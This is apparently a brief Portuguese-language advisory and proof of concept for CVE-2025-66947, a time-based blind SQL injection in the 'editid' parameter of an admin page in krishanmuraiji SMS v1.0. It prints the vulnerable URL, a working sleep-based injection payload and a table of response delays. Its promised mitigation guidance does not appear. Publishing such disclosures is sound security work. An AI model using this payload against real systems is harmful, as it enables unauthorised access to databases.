
Prova de conceito para injeção SQL cega baseada em tempo em um painel administrativo PHP. Demonstra exploração via parâmetro GET não sanitizado, com orientação de mitigação para uso defensivo.
⏱️ Comparação visual: resposta normal vs resposta atrasada ~6s
TL;DR: Um parâmetro GET em um módulo administrativo permite injeção SQL baseada em tempo através de atrasos na resposta.
Uma vulnerabilidade de injeção SQL cega baseada em tempo existe no krishanmuraiji SMS v1.0 devido à validação inadequada de um parâmetro GET em um módulo administrativo.
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| Payload | Atraso |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
Atraso consistente = Injeção SQL Confirmada
Esse padrão de vulnerabilidade aparece comumente em:
Mesmo quando a autenticação é necessária e erros são ocultados,
A injeção SQL baseada em tempo continua explorável e perigosa.
Severidade: Alta
CVE-2025-66947
Ranjan KumarEsta PoC é fornecida apenas para fins educacionais e defensivos.
CVE-2025-66947, Injeção SQL, Injeção SQL Cega Baseada em Tempo, PHP, Painel Administrativo